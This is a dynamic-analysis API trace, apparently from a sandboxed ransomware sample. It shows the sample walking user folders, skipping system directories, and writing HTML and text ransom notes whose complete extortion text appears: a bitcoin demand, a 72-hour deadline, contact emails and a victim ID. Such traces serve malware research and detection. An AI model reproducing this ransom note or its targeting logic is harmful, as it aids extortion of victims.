	[0180.341] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Videos\\*.*", cchLength=0x1b | out: lpsz="c:\\users\\default\\videos\\*.*") returned 0x1b
	[0180.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.341] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="windows") returned 0x0
	[0180.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.342] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="boot") returned 0x0
	[0180.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.342] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="system volume information") returned 0x0
	[0180.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.342] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.343] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="temp") returned 0x0
	[0180.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.343] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="program files") returned 0x0
	[0180.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.343] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.343] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="appdata") returned 0x0
	[0180.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.344] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="application data") returned 0x0
	[0180.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.344] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="winnt") returned 0x0
	[0180.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.345] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="tmp") returned 0x0
	[0180.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.345] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="cache") returned 0x0
	[0180.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.346] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.346] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="webcache") returned 0x0
	[0180.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.346] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="inetcache") returned 0x0
	[0180.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.346] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="nvidia") returned 0x0
	[0180.347] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.347] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="packages") returned 0x0
	[0180.347] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.347] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="cookies") returned 0x0
	[0180.347] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.347] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="programdata") returned 0x0
	[0180.347] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84aa35ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.347] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84aa35ca, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84aa35ca, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84aa35ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.348] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0180.348] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0180.348] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Default\\Videos\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\"
	[0180.348] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0180.348] lstrlenW (lpString="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 52
	[0180.348] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.348] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x34 | out: lpsz="c:\\users\\default\\videos\\help_decrypt_your_files.html") returned 0x34
	[0180.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.348] StrStrW (lpFirst="c:\\users\\default\\videos\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0180.349] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a7d3b2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a7d3b2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84aa35ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.349] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0180.349] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0180.349] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Default\\Videos\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\"
	[0180.349] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0180.349] lstrlenW (lpString="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 51
	[0180.349] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.349] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x33 | out: lpsz="c:\\users\\default\\videos\\help_decrypt_your_files.txt") returned 0x33
	[0180.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.350] StrStrW (lpFirst="c:\\users\\default\\videos\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0180.350] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a7d3b2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a7d3b2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84aa35ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.350] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0180.350] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0180.350] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos"
	[0180.350] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Videos\\*.*") returned="C:\\Users\\Default\\Videos\\*.*"
	[0180.351] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.351] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.351] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 51
	[0180.351] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.354] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.354] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.356] CloseHandle (hObject=0x380) returned 1
	[0180.356] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.357] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.358] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.358] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.358] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.359] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.359] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.359] CloseHandle (hObject=0x380) returned 1
	[0180.360] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.360] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.360] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.360] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 52
	[0180.361] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.363] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.363] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.366] CloseHandle (hObject=0x380) returned 1
	[0180.366] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.366] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.367] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.369] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.369] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.369] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.369] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.369] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.369] CloseHandle (hObject=0x380) returned 1
	[0180.370] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*.*" (normalized: "c:\\users\\default\\videos\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x84aa35ca, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84aa35ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0180.370] lstrlenW (lpString="C:\\Users\\Default\\Videos\\*.*") returned 27
	[0180.370] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.370] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Videos\\*.*", cchLength=0x1b | out: lpsz="c:\\users\\default\\videos\\*.*") returned 0x1b
	[0180.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.370] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="windows") returned 0x0
	[0180.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.371] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="boot") returned 0x0
	[0180.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.371] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="system volume information") returned 0x0
	[0180.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.371] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.371] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="temp") returned 0x0
	[0180.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.372] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="program files") returned 0x0
	[0180.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.372] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.372] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="appdata") returned 0x0
	[0180.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.372] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="application data") returned 0x0
	[0180.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.373] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="winnt") returned 0x0
	[0180.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.373] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="tmp") returned 0x0
	[0180.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.373] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="cache") returned 0x0
	[0180.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.373] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.374] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="webcache") returned 0x0
	[0180.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.374] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="inetcache") returned 0x0
	[0180.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.374] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="nvidia") returned 0x0
	[0180.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.374] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="packages") returned 0x0
	[0180.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.375] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="cookies") returned 0x0
	[0180.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.375] StrStrW (lpFirst="c:\\users\\default\\videos\\*.*", lpSrch="programdata") returned 0x0
	[0180.375] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.375] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.375] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x84aa35ca, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84aa35ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.381] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.381] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84aa35ca, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84aa35ca, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85099476, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.381] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a7d3b2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a7d3b2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8507313b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.381] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a7d3b2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a7d3b2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8507313b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.381] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0180.381] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0180.382] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0
	[0180.382] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0180.382] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0180.382] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x4f6643a1, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x4f6643a1, ftLastAccessTime.dwHighDateTime=0x1d112ea, ftLastWriteTime.dwLowDateTime=0x4f6643a1, ftLastWriteTime.dwHighDateTime=0x1d112ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1
	[0180.382] lstrcmpW (lpString1="Default User", lpString2="..") returned 1
	[0180.382] lstrcmpW (lpString1="Default User", lpString2=".") returned 1
	[0180.382] lstrcpyW (in: lpString1=0x18dcbc, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users"
	[0180.383] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0180.383] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User"
	[0180.383] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User"
	[0180.383] lstrcatW (in: lpString1="C:\\Users\\Default User", lpString2="\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\"
	[0180.383] lstrcpyW (in: lpString1=0x18cda4, lpString2="C:\\Users\\Default User\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\"
